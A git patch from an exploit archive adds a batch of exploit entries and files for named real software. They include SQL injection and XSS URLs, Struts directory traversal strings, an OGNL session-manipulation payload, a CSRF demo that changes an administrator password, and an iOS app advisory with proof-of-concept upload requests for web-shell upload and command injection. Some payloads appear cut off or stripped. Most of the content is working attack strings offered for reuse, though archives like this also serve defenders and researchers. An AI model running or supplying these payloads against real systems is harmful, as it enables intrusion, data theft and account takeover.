From a327467416955bfc6a6cc031d2468aefb61a9e3b Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sun, 30 Mar 2014 04:31:18 +0000 Subject: [PATCH] Updated 03_30_2014 --- files.csv | 19 ++ platforms/asp/webapps/32577.txt | 7 + platforms/asp/webapps/32580.txt | 15 ++ platforms/hardware/webapps/32569.txt | 368 +++++++++++++++++++++++++++ platforms/java/webapps/32574.txt | 9 + platforms/jsp/webapps/32579.html | 18 ++ platforms/multiple/remote/32564.txt | 11 + platforms/multiple/remote/32565.txt | 11 + platforms/multiple/webapps/32576.txt | 11 + platforms/php/webapps/32562.txt | 34 +++ platforms/php/webapps/32563.txt | 7 + platforms/php/webapps/32566.txt | 9 + platforms/php/webapps/32567.txt | 12 + platforms/php/webapps/32570.txt | 9 + platforms/php/webapps/32571.txt | 10 + platforms/php/webapps/32575.txt | 9 + platforms/windows/dos/32572.txt | 13 + platforms/windows/dos/32573.txt | 9 + platforms/windows/remote/32568.rb | 172 +++++++++++++ platforms/windows/remote/32578.py | 161 ++++++++++++ 20 files changed, 914 insertions(+) create mode 100755 platforms/asp/webapps/32577.txt create mode 100755 platforms/asp/webapps/32580.txt create mode 100755 platforms/hardware/webapps/32569.txt create mode 100755 platforms/java/webapps/32574.txt create mode 100755 platforms/jsp/webapps/32579.html create mode 100755 platforms/multiple/remote/32564.txt create mode 100755 platforms/multiple/remote/32565.txt create mode 100755 platforms/multiple/webapps/32576.txt create mode 100755 platforms/php/webapps/32562.txt create mode 100755 platforms/php/webapps/32563.txt create mode 100755 platforms/php/webapps/32566.txt create mode 100755 platforms/php/webapps/32567.txt create mode 100755 platforms/php/webapps/32570.txt create mode 100755 platforms/php/webapps/32571.txt create mode 100755 platforms/php/webapps/32575.txt create mode 100755 platforms/windows/dos/32572.txt create mode 100755 platforms/windows/dos/32573.txt create mode 100755 platforms/windows/remote/32568.rb create mode 100755 platforms/windows/remote/32578.py diff --git a/files.csv b/files.csv index b1944fdf6..75e06fba7 100755 --- a/files.csv +++ b/files.csv @@ -29324,3 +29324,22 @@ id,file,description,date,author,platform,type,port 32559,platforms/hardware/webapps/32559.txt,"Easy FileManager 1.1 iOS - Multiple Vulnerabilities",2014-03-27,Vulnerability-Lab,hardware,webapps,8080 32560,platforms/hardware/webapps/32560.txt,"ePhone Disk 1.0.2 iOS - Multiple Vulnerabilities",2014-03-27,Vulnerability-Lab,hardware,webapps,8080 32561,platforms/php/webapps/32561.txt,"LinEx - Password Reset Vulnerability",2014-03-27,"N B Sri Harsha",php,webapps,80 +32562,platforms/php/webapps/32562.txt,"Joomla Kunena Component 3.0.4 - Persistent XSS",2014-03-27,Qoppa,php,webapps,80 +32563,platforms/php/webapps/32563.txt,"YourFreeWorld Downline Builder Pro 'id' Parameter SQL Injection Vulnerability",2008-11-02,"Hussin X",php,webapps,0 +32564,platforms/multiple/remote/32564.txt,"XWork 2.0.x 'ParameterInterceptor' Class OGNL Security Bypass Vulnerability",2008-11-04,"Meder Kydyraliev",multiple,remote,0 +32565,platforms/multiple/remote/32565.txt,"Struts <= 2.0.11 Multiple Directory Traversal Vulnerabilities",2008-11-04,"Csaba Barta",multiple,remote,0 +32566,platforms/php/webapps/32566.txt,"firmCHANNEL Indoor & Outdoor Digital Signage 3.24 Cross Site Scripting Vulnerability",2008-11-04,"Brad Antoniewicz",php,webapps,0 +32567,platforms/php/webapps/32567.txt,"DHCart 3.84 Multiple Cross Site Scripting And HTML Injection Vulnerabilities",2008-11-04,Lostmon,php,webapps,0 +32568,platforms/windows/remote/32568.rb,"Fitnesse Wiki Remote Command Execution Vulnerability",2014-03-28,"SecPod Research",windows,remote,80 +32569,platforms/hardware/webapps/32569.txt,"iStArtApp FileXChange 6.2 iOS - Multiple Vulnerabilities",2014-03-28,Vulnerability-Lab,hardware,webapps,8888 +32570,platforms/php/webapps/32570.txt,"CuteNews aj-fork 'path' Parameter Remote File Include Vulnerability",2008-11-06,DeltahackingTEAM,php,webapps,0 +32571,platforms/php/webapps/32571.txt,"TurnkeyForms Software Directory 1.0 SQL Injection and Cross Site Scripting Vulnerabilities",2008-11-07,G4N0K,php,webapps,0 +32572,platforms/windows/dos/32572.txt,"Anti-Trojan Elite 4.2.1 - Atepmon.sys IOCTL Request Local Overflow",2008-11-07,alex,windows,dos,0 +32573,platforms/windows/dos/32573.txt,"Microsoft Windows 2003/Vista - 'UnhookWindowsHookEx' Local Denial Of Service Vulnerability",2008-11-09,killprog.org,windows,dos,0 +32574,platforms/java/webapps/32574.txt,"MoinMoin 1.5.8/1.9 Cross-Site Scripting and Information Disclosure Vulnerabilities",2008-11-09,"Xia Shing Zee",java,webapps,0 +32575,platforms/php/webapps/32575.txt,"Zeeways SHAADICLONE 2.0 'admin/home.php' Authentication Bypass Vulnerability",2008-11-08,G4N0K,php,webapps,0 +32576,platforms/multiple/webapps/32576.txt,"IBM Tivoli Netcool Service Quality Manager Cross Site Scripting And HTML Injection Vulnerabilities",2008-11-10,"Francesco Bianchino",multiple,webapps,0 +32577,platforms/asp/webapps/32577.txt,"Dizi Portali 'film.asp' SQL Injection Vulnerability",2008-11-10,"Kaan KAMIS",asp,webapps,0 +32578,platforms/windows/remote/32578.py,"Yosemite Backup 8.70 'DtbClsLogin()' Remote Buffer Overflow Vulnerability",2008-11-11,"Abdul-Aziz Hariri",windows,remote,0 +32579,platforms/jsp/webapps/32579.html,"Sun Java System Identity Manager 6.0/7.x Multiple Vulnerabilities",2008-11-11,"Richard Brain",jsp,webapps,0 +32580,platforms/asp/webapps/32580.txt,"ASP-Nuke 2.0.7 - 'gotourl.asp' Open Redirect Vulnerability",2014-03-29,"felipe andrian",asp,webapps,0 diff --git a/platforms/asp/webapps/32577.txt b/platforms/asp/webapps/32577.txt new file mode 100755 index 000000000..249550a54 --- /dev/null +++ b/platforms/asp/webapps/32577.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/32239/info + +Dizi Portali is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/film.asp?film=1+union+select+0,1,sifre,3,4,5+from+ayarlar \ No newline at end of file diff --git a/platforms/asp/webapps/32580.txt b/platforms/asp/webapps/32580.txt new file mode 100755 index 000000000..5b9840c51 --- /dev/null +++ b/platforms/asp/webapps/32580.txt @@ -0,0 +1,15 @@ +[+] ASP-Nuke 2.0.7 - Open Redirect Vulnerability in gotourl +[+] Date: 28/03/2014 +[+] Risk: Low +[+] Remote: Yes +[+] Author: Felipe Andrian Peixoto +[+] Vendor Homepage: http://www.aspnuke.it/ +[+] Contact: felipe_andrian@hotmail.com +[+] Tested on: Windows 7 and Linux +[+] Vulnerable File: gotourl.asp +[+] Version: ASP-Nuke 2.0.7 +[+] Exploit : http://host/gotoURL.asp?url=[ Open Redirect Vul ]&id=43569 + +Note : An open redirect is an application that takes a parameter and redirects a user to the parameter value without any validation. +This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it. +Reference :https://www.owasp.org/index.php/Open_redirect \ No newline at end of file diff --git a/platforms/hardware/webapps/32569.txt b/platforms/hardware/webapps/32569.txt new file mode 100755 index 000000000..da16832b5 --- /dev/null +++ b/platforms/hardware/webapps/32569.txt @@ -0,0 +1,368 @@ +Document Title: +=============== +iStArtApp FileXChange v6.2 iOS - Multiple Vulnerabilities + + +References (Source): +==================== +http://www.vulnerability-lab.com/get_content.php?id=1237 + + +Release Date: +============= +2014-03-26 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +1237 + + +Common Vulnerability Scoring System: +==================================== +7.4 + + +Product & Service Introduction: +=============================== +FileXChange is a handy file manager for iPhone, iPod Touch and iPad. With FileXChange, you can share files with Mac, Windows, Linux and other iOS devices, +and use your iPhone, iPod Touch or iPad as a flash memory. With FileXChange, your iPhone, iPodTouch or iPad becomes a flash-memory drive. You can store files, +open them on your device or on any MAC or PC, wirelessly, using a simple internet browser. + +(Copy of the Homepage: https://itunes.apple.com/us/app/filexchange/id428955307 ) + + +Abstract Advisory Information: +============================== +The Vulnerability Laboratory Research Team discovered multiple high severity vulnerabilities in the official iStArtApp FileXChange v6.2 iOS mobile application. + + +Vulnerability Disclosure Timeline: +================================== +2014-03-26: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Affected Product(s): +==================== +iStArtApp +Product: FileXChange - iOS Mobile Web Application 6.2 + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +High + + +Technical Details & Description: +================================ +1.1 +A local file include web vulnerability has been discovered in the official iStArtApp FileXChange v6.2 iOS mobile web-application. +A file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path +commands to compromise the web-application or mobile device. + +The web vulnerability is located in the `filename` value of the `Upload a File` module. Remote attackers are able to inject own files with +malicious `filename` value in the upload POST method request to compromise the mobile web-application. The attack vector is persistent and +the request method is POST. The local file/path include execution occcurs in the main index file dir list. The security risk of the local +file include web vulnerability is estimated as high(+) with a cvss (common vulnerability scoring system) count of 7.5(+)|(-)7.6. + +Exploitation of the local file include web vulnerability requires no user interaction but a privileged web-application user account with +low user auth. Successful exploitation of the local file include web vulnerability results in mobile application or connected device +component compromise. + +Request Method(s): + [+] [POST] + +Vulnerable Module(s): + [+] Upload a File > Submit + +Vulnerable Parameter(s): + [+] filename + +Affected Module(s): + [+] Index File Dir List (http://localhost:8888/) + + + +1.2 +An arbitrary file upload web vulnerability has been discovered in the official iStArtApp FileXChange v6.2 iOS mobile web-application. +The arbitrary file upload issue allows remote attackers to upload files with multiple extensions to bypass the web-server or system validation. + +The vulnerability is located in the `Upload a File` module. Remote attackers are able to upload a php or js web-shells by renaming the file with +multiple extensions to bypass the file restriction mechanism. The attacker uploads for example a web-shell with the following name and extension +`test.txt.html.php.js.aspx.txt`. After the upload the attacker needs to open the file with the path value in the web application. He deletes the +.txt file extension and can access the application with elevated executable access rights. The security risk of the arbitrary file upload web +vulnerability is estimated as high(+) with a cvss (common vulnerability scoring system) count of 7.2(+)|(-)7.3. + +Exploitation of the arbitrary file upload web vulnerability requires no user interaction or privileged application user account with password. +Successful exploitation of the vulnerability results in unauthorized file access because of a compromise after the upload of web-shells. + +Request Method(s): + [+] [POST] + +Vulnerable Module(s): + [+] Select File > Upload + +Vulnerable Parameter(s): + [+] filename (multiple extensions) + +Affected Module(s): + [+] Index File Dir List (http://localhost:8888/) + + + +1.3 +A local command/path injection web vulnerabilities has been discovered in the official iStArtApp FileXChange v6.2 iOS mobile web-application. +A command inject vulnerability allows attackers to inject local commands via vulnerable system values to compromise the apple mobile iOS application. + +The vulnerability is located in the vulnerable `devicename` value of the wifi fapplication. Local attackers are able to inject own malicious +system specific commands or path value requests via devicename value. The injection requires an active sync of the device information by new connections. +The execution of the local command inject via devicename value on sync occurs in the header loction of all interface sites. The security risk of the local +command/path inject vulnerability is estimated as high(-) with a cvss (common vulnerability scoring system) count of 5.7(+)|(-)5.8. + +Exploitation of the command/path inject vulnerability requires a low privileged iOS device account with restricted access and no user interaction. +Successful exploitation of the vulnerability results in unauthorized execution of system specific commands and unauthorized path value requests to +compromise the mobile iOS application or the connected device components. + +Request Method(s): + [+] Sync + +Vulnerable Parameter(s): + [+] devicename + +Affected Module(s): + [+] Index File Dir List (http://localhost:8888/x) + [+] All Interface Header Sites (http://localhost:8888/) + + + +1.4 +A local command/path injection web vulnerabilities has been discovered in the official iStArtApp FileXChange v6.2 iOS mobile web-application. +A command inject vulnerability allows attackers to inject local commands via vulnerable system values to compromise the apple mobile iOS application. + +The vulnerability is located in the vulnerable `foldername` value of the wifi file dir list module. Local attackers are able to inject own malicious +system specific commands or path value requests in the vulnerable foldername value. The injection requires an active sync with the wifi app stored folders. +The execution of the local command inject via foldername value on sync occurs in the file dir index list of the main upload path. The security risk of +the local command/path inject vulnerability is estimated as high(-) with a cvss (common vulnerability scoring system) count of 5.6(+)|(-)5.7. + +Exploitation of the command/path inject vulnerability requires a low privileged iOS device account with restricted access and no user interaction. +Successful exploitation of the vulnerability results in unauthorized execution of system specific commands and unauthorized path value requests to +compromise the mobile iOS application or the connected device components. + +Request Method(s): + [+] Sync + +Vulnerable Parameter(s): + [+] foldername (path value) + +Affected Module(s): + [+] Index File Dir List (http://localhost:8888/) + [+] Sub Folder/Category File Dir List (http://localhost:8888/) + + +Proof of Concept (PoC): +======================= +1.1 +The local file include web vulnerability can be exploited by local attacker without user interaction or privileged application user account. +For security demonstration or to reproduce the local web vulnerability follow the provided information and steps below to continue. + +PoC: Filename [Index] + + ...... + ./[LOCAL FILE INCLUDE VULNERABILITY!]>.png.png - 0.5 Kb, 2014-03-24 12:01:44
+

To upload a file, select it and then press 'Submit':



+To delete a file or a folder, select its checkbox and press 'Submit'
Please note that you are allowed to delete one file at a time. + + +--- PoC Session Logs [POST] --- +Status: 200[OK] +POST http://192.168.2.102:8888/Work/ Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[1749] Mime Type[application/x-unknown-content-type] + Request Header: + Host[192.168.2.102:8888] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0] + Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] + Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3] + Accept-Encoding[gzip, deflate] + Referer[http://192.168.2.102:8888/Work/] + Connection[keep-alive] + POST-Daten: + POST_DATA[-----------------------------26958314732313 +Content-Disposition: form-data; name="InvioFile"; filename="<./[LOCAL FILE INCLUDE VULNERABILITY!]>.png" +Content-Type: image/png + + + + + +Status: 200[OK] +GET http://192.168.2.102:8888/Work/./[LOCAL FILE INCLUDE VULNERABILITY!]>.png Load Flags[LOAD_DOCUMENT_URI ] Gr??e des Inhalts[1750] Mime Type[application/x-unknown-content-type] + Request Header: + Host[192.168.2.102:8888] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0] + Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] + Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3] + Accept-Encoding[gzip, deflate] + Referer[http://192.168.2.102:8888/Work/] + Connection[keep-alive] + Response Header: + Accept-Ranges[bytes] + Content-Length[1750] + Date[Mo., 24 M?r. 2014 12:01:46 GMT] + + + + +1.2 +The arbitrary file upload web vulnerability can be exploited by remote attackers without userinteraction or privileged application user account. +For security demonstration or to reproduce the local web vulnerability follow the provided information and steps below to continue. + +PoC: Filename [Index] (extensions|access) + +--- PoC Session Logs [POST] --- +Status: 200[OK] +POST http://192.168.2.102:8888/Work/ Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[1749] Mime Type[application/x-unknown-content-type] + Request Header: + Host[192.168.2.102:8888] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0] + Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] + Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3] + Accept-Encoding[gzip, deflate] + Referer[http://192.168.2.102:8888/Work/] + Connection[keep-alive] + POST-Daten: + POST_DATA[-----------------------------26958314732313 +Content-Disposition: form-data; name="InvioFile"; filename="test.png.html.php.js.aspx.png" +Content-Type: image/png + + + + + +Status: 200[OK] +GET http://192.168.2.102:8888/Work/./[LOCAL FILE INCLUDE VULNERABILITY!]>.png Load Flags[LOAD_DOCUMENT_URI ] Gr??e des Inhalts[1750] Mime Type[application/x-unknown-content-type] + Request Header: + Host[192.168.2.102:8888] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0] + Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] + Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3] + Accept-Encoding[gzip, deflate] + Referer[http://192.168.2.102:8888/Work/] + Connection[keep-alive] + Response Header: + Accept-Ranges[bytes] + Content-Length[1750] + Date[Mo., 24 M?r. 2014 12:01:46 GMT] + + + + + + +1.3 +The local command injection web vulnerability can be exploited by local attackers with physical device access privileges and without user interaction. +For security demonstration or to reproduce the local web vulnerability follow the provided information and steps below to continue. + +PoC: Devicename [Header Location] + +

FileXChange

+

Device: IPhone 360*¥337><"> + + +Solution - Fix & Patch: +======================= +1.1 +The file include web vulnerability can be patched by a secure parse of the filename value in the POST method upload request. +Parse also the vulnerable index output listing with the filename value to prevent further execution of injected file requests or path values. + +1.2 +The arbitrary file upload web vulnerability can be patched by a secure encode and filter restriction of the filename value. +Disallow multiple extensions of files, encode and parse the filename again. + +1.3 +The local command injection web vulnerability can be patched by a secure parse and encode of the vulnerable device name info value. +Encode the sync input of the device name and setup a own secure classe to encode all output of device information values. + + +1.4 +Parse and encode the foldername value in the add via sync POST method request. Prepare to encode and filter also the foldername oputput listing in the index- or sub-dir. + + +Security Risk: +============== +1.1 +The security risk of the local file include web vulnerability is estimated as critical. + +1.2 +The security risk of the arbitrary file upload web vulnerability is estimated as high. + +1.3 +The security risk of the first command inject web vulnerability in the device name value is estimated as high(-). + +1.4 +The security risk of the second command inject web vulnerability in the folder/path value via sync is estimated as high. + + +Credits & Authors: +================== +Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, +either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- +Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business +profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some +states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation +may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases +or trade with fraud/stolen material. + +Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com +Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com +Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com +Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php + +Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. +Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other +media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and +other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), +modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. + + Copyright ? 2014 | Vulnerability Laboratory [Evolution Security] + + + +-- +VULNERABILITY LABORATORY RESEARCH TEAM +DOMAIN: www.vulnerability-lab.com +CONTACT: research@vulnerability-lab.com + + diff --git a/platforms/java/webapps/32574.txt b/platforms/java/webapps/32574.txt new file mode 100755 index 000000000..16a3df3ea --- /dev/null +++ b/platforms/java/webapps/32574.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/32208/info + +MoinMoin is prone to cross-site scripting and information-disclosure vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials or other sensitive information and to launch other attacks. + +MoinMoin 1.5.9 and 1.8.0 are vulnerable; other versions may also be affected. + +http://www.example.com/%08?action=fullsearch&value=linkto%3A%22%08%22&context=180 http://www.example.com/VulnVulnVulnVuln/VulnVulnVuln/Vul......... \ No newline at end of file diff --git a/platforms/jsp/webapps/32579.html b/platforms/jsp/webapps/32579.html new file mode 100755 index 000000000..67b5af7a1 --- /dev/null +++ b/platforms/jsp/webapps/32579.html @@ -0,0 +1,18 @@ +source: http://www.securityfocus.com/bid/32262/info + + +Sun Java System Identity Manager is prone to multiple web-interface vulnerabilities, including a cross-site request-forgery issue, multiple cross-site scripting issues, multiple HTML-injection issues, and a directory-traversal vulnerability. + +Successful exploits of many of these issues will allow an attacker to completely compromise the affected application. + +These issues affect the following versions: + +Sun Java System Identity Manager 6.0 +Sun Java System Identity Manager 6.0 SP1 +Sun Java System Identity Manager 6.0 SP2 +Sun Java System Identity Manager 6.0 SP3 +Sun Java System Identity Manager 6.0 SP4 +Sun Java System Identity Manager 7.0 +Sun Java System Identity Manager 7.1 + +

CSRF attack demo - changes administrative password to 'Password19'

\ No newline at end of file diff --git a/platforms/multiple/remote/32564.txt b/platforms/multiple/remote/32564.txt new file mode 100755 index 000000000..e770e16c0 --- /dev/null +++ b/platforms/multiple/remote/32564.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/32101/info + +XWork is prone to a security-bypass vulnerability because it fails to adequately handle user-supplied input. + +Attackers can exploit this issue to manipulate server-side context objects with the privileges of the user running the application. Successful exploits can compromise the application and possibly the underlying computer. + +Versions prior to XWork 2.0.6 are vulnerable. Struts 2.0.0 through 2.0.11.2 contain vulnerable versions of XWorks and are therefore also affected. + +To set #session.user to '0wn3d': + +('\u0023' + 'session[\'user\']')(unused)=0wn3d \ No newline at end of file diff --git a/platforms/multiple/remote/32565.txt b/platforms/multiple/remote/32565.txt new file mode 100755 index 000000000..09f0b86b8 --- /dev/null +++ b/platforms/multiple/remote/32565.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/32104/info + +Struts is prone to multiple directory-traversal vulnerabilities because the application fails to sufficiently sanitize user-supplied input. + +An attacker can exploit these issues using directory-traversal strings ('../') to download arbitrary files with the privileges of the webserver process. Information obtained may aid in further attacks. + +Versions prior to Struts 2.0.12 are vulnerable. + +http://www.example.com:8080/struts2-blank-2.0.11.1/struts.. +http://www.example.com:8080/struts2-blank-2.0.11.1/struts/..%252f +http://www.example.com:8080/struts2-blank-2.0.11.1/struts/..%252f..%252f..%252fWEB-INF/classess/example/Log\in.class/ \ No newline at end of file diff --git a/platforms/multiple/webapps/32576.txt b/platforms/multiple/webapps/32576.txt new file mode 100755 index 000000000..3fa43ffac --- /dev/null +++ b/platforms/multiple/webapps/32576.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/32233/info + +IBM Tivoli Netcool Service Quality Manager is prone to multiple cross-site scripting and an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied data. + +Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible. + +We don't know which versions of IBM Tivoli Netcool Service Quality Manager are affected. We will update this BID when more details emerge. + +NOTE: IBM Tivoli Netcool Service Quality Manager may also have been known as 'Vallent Metrica Service Assurance'. + +http://www.example.com//ReportTree?action=generatedreportresults&elementid=">